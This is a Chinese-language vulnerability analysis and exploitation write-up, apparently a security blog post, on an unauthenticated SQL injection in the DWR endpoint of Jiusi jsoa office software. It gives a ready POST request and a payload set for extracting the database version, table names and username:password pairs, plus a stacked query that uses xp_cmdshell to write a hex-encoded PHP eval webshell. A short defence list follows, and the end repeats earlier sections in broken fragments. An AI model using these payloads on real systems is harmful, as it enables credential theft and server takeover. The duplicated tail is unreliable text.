DWR组件未授权SQL注入漏洞分析与利用<\/h1>

0x01 漏洞概述<\/h2>

北京九思协同办公软件（jsoa）的\/workflow\/dwr\/<\/code>接口存在未授权SQL注入漏洞。攻击者可以利用该漏洞：<\/p>


获取数据库敏感信息（如管理员凭据、用户数据）<\/li>
高权限情况下可写入Webshell<\/li>
进一步获取服务器系统权限<\/li>
<\/ol>
0x02 漏洞背景<\/h2>
DWR技术简介<\/h3>
Direct Web Remoting (DWR)是一个开源Java库，允许客户端JavaScript直接调用服务器端Java方法。该技术通过动态生成JavaScript代码实现远程调用。<\/p>
漏洞组件<\/h3>
漏洞位于uk.ltd.getahead.dwr.DWRServlet<\/code>组件，配置文件中暴露了多个危险方法。<\/p>
0x03 漏洞分析<\/h2>
配置缺陷<\/h3>
在WEB-INF\/web.xml<\/code>中存在以下关键配置：<\/p>
<servlet-mapping><\/span>
<\/span><\/span>    <servlet-name><\/span>dwr-workflow<\/servlet-name><\/span>
<\/span><\/span>    <url-pattern><\/span>\/workflow\/dwr\/*<\/url-pattern><\/span>
<\/span><\/span><\/servlet-mapping><\/span>
<\/span><\/span>
<\/span><\/span><servlet><\/span>
<\/span><\/span>    <servlet-name><\/span>dwr-workflow<\/servlet-name><\/span>
<\/span><\/span>    <display-name><\/span>DWR Servlet<\/display-name><\/span>
<\/span><\/span>    <description><\/span>Direct Web Remoter Servlet<\/description><\/span>
<\/span><\/span>    <servlet-class><\/span>uk.ltd.getahead.dwr.DWRServlet<\/servlet-class><\/span>
<\/span><\/span>    <init-param><\/span>
<\/span><\/span>        <param-name><\/span>debug<\/param-name><\/span>
<\/span><\/span>        <param-value><\/span>true<\/param-value><\/span>
<\/span><\/span>    <\/init-param><\/span>
<\/span><\/span>    <init-param><\/span>
<\/span><\/span>        <param-name><\/span>config-webform<\/param-name><\/span>
<\/span><\/span>        <param-value><\/span>\/WEB-INF\/xml\/jsflow.xml<\/param-value><\/span>
<\/span><\/span>    <\/init-param><\/span>
<\/span><\/span><\/servlet><\/span>
<\/span><\/span><\/code><\/pre>危险方法<\/h3>
配置文件中暴露了多个危险方法，包括：<\/p>
<include<\/span> method=<\/span>"getUserStatus"<\/span>\/><\/span>
<\/span><\/span><include<\/span> method=<\/span>"getUserStatusByEmpIdStr"<\/span>\/><\/span>
<\/span><\/span><include<\/span> method=<\/span>"getUserStatusByEmpOrgGrp"<\/span>\/><\/span>
<\/span><\/span><include<\/span> method=<\/span>"getUserStatusByRole"<\/span>\/><\/span>
<\/span><\/span><include<\/span> method=<\/span>"getLeaderByOrgId"<\/span>\/><\/span>
<\/span><\/span><include<\/span> method=<\/span>"getWFOnlineUser"<\/span>\/><\/span>
<\/span><\/span><include<\/span> method=<\/span>"userCanCreateFlow"<\/span>\/><\/span>
<\/span><\/span><\/code><\/pre>漏洞代码分析<\/h3>
以getLeaderByOrgId<\/code>方法为例：<\/p>
public<\/span> String getLeaderByOrgId<\/span>(<\/span>String operProcOrg)<\/span> {<\/span>
<\/span><\/span>    WorkFlowBD bd =<\/span> new<\/span> WorkFlowBD();<\/span>
<\/span><\/span>    MyInfoBD myInfoBD =<\/span> new<\/span> MyInfoBD();<\/span>
<\/span><\/span>    String[]<\/span> leader =<\/span> bd.<\/span>getLeaderListByOrgId<\/span>(<\/span>operProcOrg);<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>问题在于getLeaderListByOrgId<\/code>方法直接将用户输入的operProcOrg<\/code>参数拼接到SQL查询中，未做任何过滤处理。<\/p>
0x04 漏洞复现<\/h2>
复现步骤<\/h3>

访问\/jsoa\/workflow\/dwr\/<\/code>接口<\/li>
点击workflowSync<\/code>进入测试方法页面<\/li>
构造恶意请求利用SQL注入<\/li>
<\/ol>
请求示例<\/h3>
POST<\/span> \/jsoa\/workflow\/dwr\/exec\/workflowSync.getLeaderByOrgId.dwr HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Accept-Language:<\/span> zh-CN,zh;q=0.9<\/span>
<\/span><\/span>Content-Type:<\/span> text\/plain<\/span>
<\/span><\/span>User-Agent:<\/span> Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/131.0.0.0 Safari\/537.36<\/span>
<\/span><\/span>Accept:<\/span> *\/*<\/span>
<\/span><\/span>Content-Length:<\/span> 122<\/span>
<\/span><\/span>
<\/span><\/span>callCount<\/span>=<\/span>1<\/span>
<\/span><\/span>c0-scriptName<\/span>=<\/span>workflowSync<\/span>
<\/span><\/span>c0-methodName<\/span>=<\/span>getLeaderByOrgId<\/span>
<\/span><\/span>c0-id<\/span>=<\/span>1908_1736498493215<\/span>
<\/span><\/span>c0-param0<\/span>=<\/span>string:xml=true' AND 1=CONVERT(int,(SELECT @@version))--<\/span>
<\/span><\/span><\/code><\/pre>其他可利用方法<\/h3>
除getLeaderByOrgId<\/code>外，以下方法也存在SQL注入漏洞：<\/p>

getUserStatus<\/code><\/li>
getUserStatusByEmpIdStr<\/code><\/li>
getUserStatusByEmpOrgGrp<\/code><\/li>
getUserStatusByRole<\/code><\/li>
getWFOnlineUser<\/code><\/li>
userCanCreateFlow<\/code><\/li>
<\/ol>
0x05 漏洞利用<\/h2>
信息收集<\/h3>
-- 获取数据库版本
<\/span><\/span><\/span><\/span>string:xml=<\/span>true<\/span>' AND 1=CONVERT(int,(SELECT @@version))--
<\/span><\/span><\/span>
<\/span><\/span><\/span>-- 获取当前数据库用户
<\/span><\/span><\/span>string:xml=true'<\/span> AND<\/span> 1<\/span>=<\/span>CONVERT<\/span>(int,(SELECT<\/span> CURRENT_USER<\/span>))--
<\/span><\/span><\/span><\/span>
<\/span><\/span>-- 获取数据库名称
<\/span><\/span><\/span><\/span>string:xml=<\/span>true<\/span>' AND 1=CONVERT(int,(SELECT DB_NAME()))--
<\/span><\/span><\/span><\/code><\/pre>数据提取<\/h3>
-- 获取表名
<\/span><\/span><\/span><\/span>string:xml=<\/span>true<\/span>' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sysobjects WHERE xtype='<\/span>U'))--
<\/span><\/span><\/span>
<\/span><\/span><\/span>-- 获取列名
<\/span><\/span><\/span>string:xml=true'<\/span> AND<\/span> 1<\/span>=<\/span>CONVERT<\/span>(int,(SELECT<\/span> TOP 1<\/span> COLUMN_NAME<\/span> FROM<\/span> INFORMATION_SCHEMA.COLUMNS WHERE<\/span> TABLE_NAME<\/span>=<\/span>'users'<\/span>))--
<\/span><\/span><\/span><\/span>
<\/span><\/span>-- 获取数据
<\/span><\/span><\/span><\/span>string:xml=<\/span>true<\/span>' AND 1=CONVERT(int,(SELECT TOP 1 username+'<\/span>:'+password FROM users))--
<\/span><\/span><\/span><\/code><\/pre>写入Webshell<\/h3>
string:xml=<\/span>true<\/span>'; DECLARE @a varchar(8000); SET @a=0x3C3F70687020406576616C28245F504F53545B2763275D293B3F3E; EXEC master.dbo.xp_cmdshell '<\/span>echo ' + @a + '<\/span> ><\/span> C<\/span>:\<\/span>inetpub\<\/span>wwwroot\<\/span>shell.php';--
<\/span><\/span><\/span><\/code><\/pre>0x06 防御措施<\/h2>

输入验证<\/strong>：对所有输入参数进行严格过滤和验证<\/li>
权限控制<\/strong>：限制DWR接口的访问权限<\/li>
参数化查询<\/strong>：使用预编译语句替代动态SQL拼接<\/li>
组件升级<\/strong>：更新DWR组件到最新安全版本<\/li>
敏感方法限制<\/strong>：移除或保护不必要暴露的方法<\/li>
错误处理<\/strong>：禁用详细的错误信息返回<\/li>
<\/ol>
0x07 参考链接<\/h2>

DWR技术介绍 - 先知社区<\/a><\/li>
OWASP SQL注入防护指南<\/a><\/li>
<\/ol>

DWR组件未授权SQL注入漏洞分析与利用<\/h1>

0x02 漏洞背景<\/h2>

DWR技术简介<\/h3> Direct Web Remoting (DWR)是一个开源Java库，允许客户端JavaScript直接调用服务器端Java方法。该技术通过动态生成JavaScript代码实现远程调用。<\/p>

漏洞组件<\/h3> 漏洞位于uk.ltd.getahead.dwr.DWRServlet<\/code>组件，配置文件中暴露了多个危险方法。<\/p>

0x05 漏洞利用<\/h2>

0x07 参考链接<\/h2> DWR技术介绍 - 先知社区<\/a><\/li> OWASP SQL注入防护指南<\/a><\/li> <\/ol>

DWR技术简介<\/h3>
Direct Web Remoting (DWR)是一个开源Java库，允许客户端JavaScript直接调用服务器端Java方法。该技术通过动态生成JavaScript代码实现远程调用。<\/p>

漏洞组件<\/h3>
漏洞位于`uk.ltd.getahead.dwr.DWRServlet<\/code>组件，配置文件中暴露了多个危险方法。<\/p>`

0x07 参考链接<\/h2>

DWR技术介绍 - 先知社区<\/a><\/li>
OWASP SQL注入防护指南<\/a><\/li> <\/ol>